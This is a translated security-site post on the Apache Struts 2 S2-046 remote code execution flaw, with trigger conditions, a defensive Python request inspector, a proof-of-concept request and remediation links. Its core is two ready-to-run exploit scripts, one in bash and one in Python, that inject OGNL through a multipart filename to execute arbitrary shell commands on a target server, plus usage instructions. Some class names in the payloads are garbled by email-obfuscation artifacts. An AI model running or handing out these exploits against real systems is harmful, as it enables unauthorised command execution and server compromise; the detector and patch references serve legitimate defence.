安全圈 | Focused on the latest network and information security news

046 vulnerability

Author: recor  Date: 2020-02-27

Posted 2017-03-21 | Category: web security

Disclaimer: the tools in this article are provided for personal testing and research only. Delete them within 24 hours of downloading; they must not be used for commercial or illegal purposes, and you alone bear the consequences if you do.

Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 have a security vulnerability in the Jakarta Multipart parser, caused by the program not handling file uploads correctly. An attacker can craft the Content-Type value in the HTTP request header to possibly achieve remote arbitrary code execution. S2-046 is the same type of vulnerability as S2-045, with a different vector. Users who already upgraded to the official patch after S2-045 was disclosed are not affected by this one.

Trigger conditions

1. The size of the uploaded file (as given by the Content-Length header) exceeds the maximum Struts2 allows (2GB).
2. The filename contains malicious OGNL content.
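As an added example (not from the original post), a Python 3 inspector that checks a raw multipart request for both trigger conditions, plus the NUL byte that terminates the filename in the exploit scripts further down; it is meant for log review or testing a WAF rule. The sample requests are constructed and use the harmless expression %{1+1} in place of a real payload.

```python
import re

# Struts 2 default struts.multipart.maxSize is 2 GB; a Content-Length above
# it is one of the two S2-046 trigger conditions listed above.
STRUTS_DEFAULT_MAX_SIZE = 2 * 1024 * 1024 * 1024

OGNL_MARKER = re.compile(rb"[%$]\{")  # start of an OGNL expression
FILENAME = re.compile(rb'filename="([^"\r\n]*)"', re.IGNORECASE)


def inspect_upload(raw: bytes, max_size: int = STRUTS_DEFAULT_MAX_SIZE) -> list:
    """Return the S2-046 indicators present in one raw HTTP request.

    Checked: Content-Length above struts.multipart.maxSize, an OGNL expression
    in a multipart filename, and a NUL byte in a multipart filename.
    An empty list means the request shows none of them.
    """
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    content_type = headers.get(b"content-type", b"").lower()
    if not content_type.startswith(b"multipart/form-data"):
        return findings  # only multipart bodies reach the Jakarta parser
    try:
        if int(headers.get(b"content-length", b"0")) > max_size:
            findings.append("content-length exceeds struts.multipart.maxSize")
    except ValueError:
        findings.append("malformed content-length")
    for match in FILENAME.finditer(body):
        filename = match.group(1)
        if OGNL_MARKER.search(filename):
            findings.append("OGNL expression in multipart filename")
        if b"\x00" in filename:
            findings.append("NUL byte in multipart filename")
    return findings


# Constructed sample requests (not captured traffic). The first mirrors the
# shape of the PoC on this page, with a harmless %{1+1} as the OGNL expression.
BOUNDARY = b"----WebKitFormBoundaryAnmUgTEhFhOZpr9z"
SUSPICIOUS = (b"POST /doUpload.action HTTP/1.1\r\nHost: localhost:8080\r\n"
              b"Content-Length: 3000000000\r\n"
              b"Content-Type: multipart/form-data;boundary=" + BOUNDARY + b"\r\n\r\n"
              b"--" + BOUNDARY + b"\r\nContent-Disposition: form-data;name=\"upload\";"
              b"filename=\"%{1+1}\x00b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n"
              b"--" + BOUNDARY + b"--\r\n")
BENIGN = SUSPICIOUS.replace(b"%{1+1}\x00b", b"report.txt").replace(b"3000000000", b"512")
```

Calling inspect_upload(SUSPICIOUS) returns all three findings, while inspect_upload(BENIGN) returns an empty list.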

S2-046 PoC

```http
POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data;name="upload";filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain

Kaboom
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--
```

Exploit

Shell version

```bash
#!/bin/bash
url=$1
cmd=$2
shift
shift
boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data;boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@ [email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}")
printf -- "--$boundary\r\nContent-Disposition: form-data;name=\"foo\";filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect:" -H "Connection: close" --data-binary @- [email protected]
```

Usage:

```bash
sh exploit-cd.sh http://xxx.com/action "whoami"
```

Python version

```python
__author__ = 'hackteam.cn'

import pycurl
import StringIO
import urllib

def tt(url,data):
    sio = StringIO.StringIO()
    c = pycurl.Curl()
    c.setopt(pycurl.URL,url)
    c.setopt(pycurl.REFERER,url)
    c.setopt(pycurl.HTTPHEADER,['Connection: close','Content-Type: multipart/form-data;boundary=---------------------------735323031399963166993862150','User-Agent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/36.0.1985.143 Safari/537.36'])
    c.setopt(pycurl.HTTP_VERSION,pycurl.CURL_HTTP_VERSION_1_0)
    c.setopt(pycurl.POST,1)
    c.setopt(pycurl.POSTFIELDS,data)
    c.setopt(pycurl.CONNECTTIMEOUT,300)
    c.setopt(pycurl.TIMEOUT,300)
    c.setopt(pycurl.WRITEFUNCTION,sio.write)
    try:
        c.perform()
    except Exception,ex:
        pass
    c.close()
    resp = sio.getvalue()
    sio.close()
    return resp

data="-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data;name=\"foo\";filename=\"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=# container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/ bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--\r\n\r\n"

print tt('https://xxx.action',data)
```

Remediation

Official advisories

https://cwiki.apache.org/confluence/display/WW/S2-045
https://cwiki.apache.org/confluence/display/WW/S2-046

Patch locations

Struts 2.3.32: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
Struts 2.5.10.1: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1

References

http://struts.apache.org/docs/s2-045.html
http://struts.apache.org/docs/s2-046.html
https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723
